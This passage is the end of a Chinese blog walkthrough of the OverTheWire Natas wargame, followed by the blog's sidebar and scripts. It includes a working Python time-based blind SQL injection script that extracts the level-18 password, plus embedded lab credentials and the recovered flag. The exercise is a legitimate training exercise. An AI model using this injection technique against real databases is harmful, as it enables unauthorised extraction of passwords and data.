class="line"></div><div class="line">char = string.letters + string.digits</div><div class="line">url = <span class="string">'http://natas17:8Ps3H0GWbn5rd9S7GmAdgQNdkhPkq9cw@natas17.natas.labs.overthewire.org/'</span></div><div class="line">passwd = <span class="string">''</span></div><div class="line">lettersin = <span class="string">''</span></div><div class="line"></div><div class="line">connect = requests.get(url)</div><div class="line"><span class="keyword">if</span> connect.status_code != requests.codes.ok:</div><div class="line">    <span class="keyword">raise</span> ValueError(<span class="string">"Fail to connect."</span>)</div><div class="line"></div><div class="line"><span class="keyword">for</span> c <span class="keyword">in</span> char:</div><div class="line">    target = url + <span class="string">'?username=natas18" AND IF(password LIKE BINARY "%'</span>+c+<span class="string">'%", sleep(5), null) %23'</span></div><div class="line">    <span class="keyword">try</span>:</div><div class="line">        requests.get(target,timeout=<span class="number">1</span>)</div><div class="line">    <span class="keyword">except</span> requests.exceptions.Timeout:</div><div class="line">        lettersin += c</div><div class="line">        <span class="keyword">print</span> lettersin</div><div class="line"></div><div class="line"><span class="keyword">print</span> <span class="string">"Start to btute force."</span></div><div class="line"></div><div class="line"><span class="keyword">for</span> i <span class="keyword">in</span> range(<span class="number">32</span>):</div><div class="line">    <span class="keyword">for</span> c <span class="keyword">in</span> lettersin:</div><div class="line">        target = url + <span class="string">'?username=natas18" AND IF(password LIKE BINARY "'</span>+passwd+c+<span class="string">'%", sleep(10), null) %23'</span></div><div class="line">        <span class="keyword">try</span>:</div><div class="line">            requests.get(target,timeout=<span class="number">9</span>)</div><div class="line">        <span class="keyword">except</span> requests.exceptions.Timeout:</div><div class="line">            passwd += c</div><div class="line">            <span class="keyword">print</span> passwd + <span class="string">'*'</span> * int(<span class="number">32</span> - len(passwd))</div><div class="line">            <span class="keyword">break</span></div><div class="line"></div><div class="line"><span class="keyword">print</span> <span class="string">"Done!"</span></div></pre></td></tr></table></figure>
<p><strong>flag:xvKIqDjy4OPv7wCRgDlmj0pFsCsDjhdP</strong></p>

      
    </div>

	
	<div>
      
        ﻿
<div class="my_post_copyright">
  <script src="//cdn.bootcss.com/clipboard.js/1.5.10/clipboard.min.js"></script>
  
  <!-- JS库 sweetalert 可修改路径 -->
  <script type="text/javascript" src="http://jslibs.wuxubj.cn/sweetalert_mini/jquery-1.7.1.min.js"></script>
  <script src="http://jslibs.wuxubj.cn/sweetalert_mini/sweetalert.min.js"></script>
  <link rel="stylesheet" type="text/css" href="http://jslibs.wuxubj.cn/sweetalert_mini/sweetalert.mini.css">
  <p><span>本文标题:</span><a href="/2017/08/21/overthewire-natas-攻略/">overthewire natas 攻略</a></p>
  <p><span>文章作者:</span><a href="/" title="访问 Benjamin 的个人博客">Benjamin</a></p>
  <p><span>发布时间:</span>2017年08月21日 - 21:08</p>
  <p><span>最后更新:</span>2017年09月07日 - 21:09</p>
  <p><span>原始链接:</span><a href="/2017/08/21/overthewire-natas-攻略/" title="overthewire natas 攻略">http://benjamin.place/2017/08/21/overthewire-natas-攻略/</a>
    <span class="copy-path"  title="点击复制文章链接"><i class="fa fa-clipboard" data-clipboard-text="http://benjamin.place/2017/08/21/overthewire-natas-攻略/"  aria-label="复制成功！"></i></span>
  </p>
  <p><span>许可协议:</span><i class="fa fa-creative-commons"></i> <a rel="license" href="https://creativecommons.org/licenses/by-nc-nd/4.0/" target="_blank" title="Attribution-NonCommercial-NoDerivatives 4.0 International (CC BY-NC-ND 4.0)">署名-非商业性使用-禁止演绎 4.0 国际</a> 转载请保留原文链接及作者。</p>  
</div>
<script> 
    var clipboard = new Clipboard('.fa-clipboard');
    clipboard.on('success', $(function(){
      $(".fa-clipboard").click(function(){
        swal({   
          title: "",   
          text: '复制成功',   
          html: false,
          timer: 500,   
          showConfirmButton: false
        });
      });
    }));  
</script>

      
</div>
	
	
    <div>
      
        
      
    </div>

    <div>
      
        

      
    </div>

    <footer class="post-footer">
      
        <div class="post-tags">
          
            <a href="/tags/web-security/" <i class="fa fa-tag"></i>web-security</a>
          
        </div>
      

      
        <div class="post-nav">
          <div class="post-nav-next post-nav-item">
            
              <a href="/2017/08/17/overthewire攻略/" rel="next" title="overthewire bandit 攻略">
                <i class="fa fa-chevron-left"></i> overthewire bandit 攻略
              </a>
            
          </div>

          <div class="post-nav-prev post-nav-item">
            
          </div>
        </div>
      

      
      
    </footer>
  </article>



    <div class="post-spread">
      
    </div>
  </div>


          </div>
          


          
  <div class="comments" id="comments">
    
  </div>


        </div>
        
          
  
<script async src="https://dn-lbstatics.qbox.me/busuanzi/2.3/busuanzi.pure.mini.js"></script>
  <div class="sidebar-toggle">
    <div class="sidebar-toggle-line-wrap">
      <span class="sidebar-toggle-line sidebar-toggle-line-first"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-middle"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-last"></span>
    </div>
  </div>

  <aside id="sidebar" class="sidebar">
    <div class="sidebar-inner">

      

      
        <ul class="sidebar-nav motion-element">
          <li class="sidebar-nav-toc sidebar-nav-active" data-target="post-toc-wrap" >
            文章目录
          </li>
          <li class="sidebar-nav-overview" data-target="site-overview">
            站点概览
          </li>
        </ul>
      

      <section class="site-overview sidebar-panel ">
        <div class="site-author motion-element" itemprop="author" itemscope itemtype="http://schema.org/Person">
          <img class="site-author-image" itemprop="image"
               src="/images/avatar.gif"
               alt="Benjamin" />
          <p class="site-author-name" itemprop="name">Benjamin</p>
          <p class="site-description motion-element" itemprop="description">And there you stayed, temporarily lost at sea.</p>
        </div>
        <nav class="site-state motion-element">
          <div class="site-state-item site-state-posts">
            <a href="/archives">
              <span class="site-state-item-count">4</span>
              <span class="site-state-item-name">日志</span>
            </a>
          </div>

          
            <div class="site-state-item site-state-categories">
              <a href="/categories">
                <span class="site-state-item-count">2</span>
                <span class="site-state-item-name">分类</span>
              </a>
            </div>
          

          
            <div class="site-state-item site-state-tags">
              <a href="/tags">
                <span class="site-state-item-count">4</span>
                <span class="site-state-item-name">标签</span>
              </a>
            </div>
          
		<br>
		<span id="busuanzi_container_site_uv">
		<b><span id="busuanzi_value_site_uv"></span></b><br>
		<span class="site-state-item-name">访客</span>
		</span>


        </nav>

        


        <div class="links-of-author motion-element">
          
            
              <span class="links-of-author-item">
                <a href="https://github.com/echo-1900" target="_blank" title="GitHub">
                  
                    <i class="fa fa-fw fa-github"></i>
                  
                  GitHub
                </a>
              </span>
            
              <span class="links-of-author-item">
                <a href="mailto:echo-1900@yeah.net" target="_blank" title="Email">
                  
                    <i class="fa fa-fw fa-envelope"></i>
                  
                  Email
                </a>
              </span>
            
          
        </div>

        
        

        
        

      </section>

      
        <section class="post-toc-wrap motion-element sidebar-panel sidebar-panel-active">
          <div class="post-toc">
            
              
            
            
              <div class="post-toc-content"><ol class="nav"><li class="nav-item nav-level-3"><a class="nav-link" href="#level_0"><span class="nav-number">1.</span> <span class="nav-text">level 0</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#level_0_-_26gt_3B_level_1"><span class="nav-number">2.</span> <span class="nav-text">level 0 -> level 1</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#level_1_-_26gt_3B_level_2"><span class="nav-number">3.</span> <span class="nav-text">level 1 -> level 2</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#level_2_-_26gt_3B_level_3"><span class="nav-number">4.</span> <span class="nav-text">level 2 -> level 3</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#level_3_-_26gt_3B_level_4"><span class="nav-number">5.</span> <span class="nav-text">level 3 -> level 4</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#level_4_-_26gt_3B_level_5"><span class="nav-number">6.</span> <span class="nav-text">level 4 -> level 5</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#level_5_-_26gt_3B_level_6"><span class="nav-number">7.</span> <span class="nav-text">level 5 -> level 6</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#level_6_-_26gt_3B_level_7"><span class="nav-number">8.</span> <span class="nav-text">level 6 -> level 7</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#level_7_-_26gt_3B_level_8"><span class="nav-number">9.</span> <span class="nav-text">level 7 -> level 8</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#level_8_-_26gt_3B_level_9"><span class="nav-number">10.</span> <span class="nav-text">level 8 -> level 9</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#level_9_-_26gt_3B_level_10"><span class="nav-number">11.</span> <span class="nav-text">level 9 -> level 10</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#level_10_-_26gt_3B_level_11"><span class="nav-number">12.</span> <span class="nav-text">level 10 -> level 11</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#level_11_-_26gt_3B_level_12"><span class="nav-number">13.</span> <span class="nav-text">level 11 -> level 12</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#level_12_-_26gt_3B_level_13"><span class="nav-number">14.</span> <span class="nav-text">level 12 -> level 13</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#level_13_-_26gt_3B_level_14"><span class="nav-number">15.</span> <span class="nav-text">level 13 -> level 14</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#level_14_-_26gt_3B_level_15"><span class="nav-number">16.</span> <span class="nav-text">level 14 -> level 15</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#level_15_-_26gt_3B_level_16"><span class="nav-number">17.</span> <span class="nav-text">level 15 -> level 16</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#level_16_-_26gt_3B_level_17"><span class="nav-number">18.</span> <span class="nav-text">level 16 -> level 17</span></a></li></ol></div>
            
          </div>
        </section>
      

    </div>
  </aside>


        
      </div>
    </main>

    <footer id="footer" class="footer">
      <div class="footer-inner">
        <div class="copyright" >
  
  &copy; 
  <span itemprop="copyrightYear">2017</span>
  <span class="with-love">
    <i class="fa fa-heart"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">Benjamin</span>
</div>

<div class="powered-by">
     QAQ 
</div>

<div class="theme-info">
  Blog - Benjamin's home
</div>

        

        
      </div>
    </footer>

    <div class="back-to-top">
      <i class="fa fa-arrow-up"></i>
    </div>
  </div>

  

<script type="text/javascript">
  if (Object.prototype.toString.call(window.Promise) !== '[object Function]') {
    window.Promise = null;
  }
</script>









  



  
  <script type="text/javascript" src="/vendors/jquery/index.js?v=2.1.3"></script>

  
  <script type="text/javascript" src="/vendors/fastclick/lib/fastclick.min.js?v=1.0.6"></script>

  
  <script type="text/javascript" src="/vendors/jquery_lazyload/jquery.lazyload.js?v=1.9.7"></script>

  
  <script type="text/javascript" src="/vendors/velocity/velocity.min.js?v=1.2.1"></script>

  
  <script type="text/javascript" src="/vendors/velocity/velocity.ui.min.js?v=1.2.1"></script>

  
  <script type="text/javascript" src="/vendors/fancybox/source/jquery.fancybox.pack.js?v=2.1.5"></script>


  


  <script type="text/javascript" src="/js/src/utils.js?v=5.0.1"></script>

  <script type="text/javascript" src="/js/src/motion.js?v=5.0.1"></script>



  
  

  
  <script type="text/javascript" src="/js/src/scrollspy.js?v=5.0.1"></script>
<script type="text/javascript" src="/js/src/post-details.js?v=5.0.1"></script>



  


  <script type="text/javascript" src="/js/src/bootstrap.js?v=5.0.1"></script>



  



  



  
  
  <script type="text/javascript">
    // Popup Window;
    var isfetched = false;
    // Search DB path;
    var search_path = "search.xml";
    if (search_path.length == 0) {
       search_path = "search.xml";
    }
    var path = "/" + search_path;
    // monitor main search box;

    function proceedsearch() {
      $("body").append('<div class="popoverlay">').css('overflow', 'hidden');
      $('.popup').toggle();

    }
    // search function;
    var searchFunc = function(path, search_id, content_id) {
    'use strict';
    $.ajax({
        url: path,
        dataType: "xml",
        async: true,
        success: function( xmlResponse ) {
            // get the contents from search data
            isfetched = true;
            $('.popup').detach().appendTo('.header-inner');
            var datas = $( "entry", xmlResponse ).map(function() {
                return {
                    title: $( "title", this ).text(),
                    content: $("content",this).text(),
                    url: $( "url" , this).text()
                };
            }).get();
            var $input = document.getElementById(search_id);
            var $resultContent = document.getElementById(content_id);
            $input.addEventListener('input', function(){
                var matchcounts = 0;
                var str='<ul class=\"search-result-list\">';                
                var keywords = this.value.trim().toLowerCase().split(/[\s\-]+/);
                $resultContent.innerHTML = "";
                if (this.value.trim().length > 1) {
                // perform local searching
                datas.forEach(function(data) {
                    var isMatch = true;
                    var content_index = [];
                    var data_title = data.title.trim().toLowerCase();
                    var data_content = data.content.trim().replace(/<[^>]+>/g,"").toLowerCase();
                    var data_url = data.url;
                    var index_title = -1;
                    var index_content = -1;
                    var first_occur = -1;
                    // only match artiles with not empty titles and contents
                    if(data_title != '' && data_content != '') {
                        keywords.forEach(function(keyword, i) {
                            index_title = data_title.indexOf(keyword);
                            index_content = data_content.indexOf(keyword);
                            if( index_title < 0 && index_content < 0 ){
                                isMatch = false;
                            } else {
                                if (index_content < 0) {
                                    index_content = 0;
                                }
                                if (i == 0) {
                                    first_occur = index_content;
                                }
                            }
                        });
                    }
                    // show search results
                    if (isMatch) {
                        matchcounts += 1;
                        str += "<li><a href='"+ data_url +"' class='search-result-title'>"+ data_title +"</a>";
                        var content = data.content.trim().replace(/<[^>]+>/g,"");
                        if (first_occur >= 0) {
                            // cut out 100 characters
                            var start = first_occur - 20;
                            var end = first_occur + 80;
                            if(start < 0){
                                start = 0;
                            }
                            if(start == 0){
                                end = 50;
                            }
                            if(end > content.length){
                                end = content.length;
                            }
                            var match_content = content.substring(start, end);
                            // highlight all keywords
                            keywords.forEach(function(keyword){
                                var regS = new RegExp(keyword, "gi");
                                match_content = match_content.replace(regS, "<b class=\"search-keyword\">"+keyword+"</b>");
                            });
                            
                            str += "<p class=\"search-result\">" + match_content +"...</p>"
                        }
                        str += "</li>";
                    }
                })};
                str += "</ul>";
                if (matchcounts == 0) { str = '<div id="no-result"><i class="fa fa-frown-o fa-5x" /></div>' }
                if (keywords == "") { str = '<div id="no-result"><i class="fa fa-search fa-5x" /></div>' }
                $resultContent.innerHTML = str;
            });
            proceedsearch();
        }
    });}

    // handle and trigger popup window;
    $('.popup-trigger').mousedown(function(e) {
      e.stopPropagation();
      if (isfetched == false) {
        searchFunc(path, 'local-search-input', 'local-search-result');
      } else {
        proceedsearch();
      };

    });

    $('.popup-btn-close').click(function(e){
      $('.popup').hide();
      $(".popoverlay").remove();
      $('body').css('overflow', '');
    });
    $('.popup').click(function(e){
      e.stopPropagation();
    });
  </script>

  

  

  
<script type="text/javascript" async src="//push.zhanzhang.baidu.com/push.js">
</script>
<script>
(function(){
    var bp = document.createElement('script');
    var curProtocol = window.location.protocol.split(':')[0];
    if (curProtocol === 'https') {
        bp.src = 'https://zz.bdstatic.com/linksubmit/push.js';        
    }
    else {
        bp.src = 'http://push.zhanzhang.baidu.com/push.js';
    }
    var s = document.getElementsByTagName("script")[0];
    s.parentNode.insertBefore(bp, s);
})();
</script>



<script type="text/javascript"
color="85,187,212" opacity='0.6' zIndex="-2" count="100" src="//cdn.bootcss.com/canvas-nest.js/1.0.0/canvas-nest.min.js"></script>

</body>
</html>
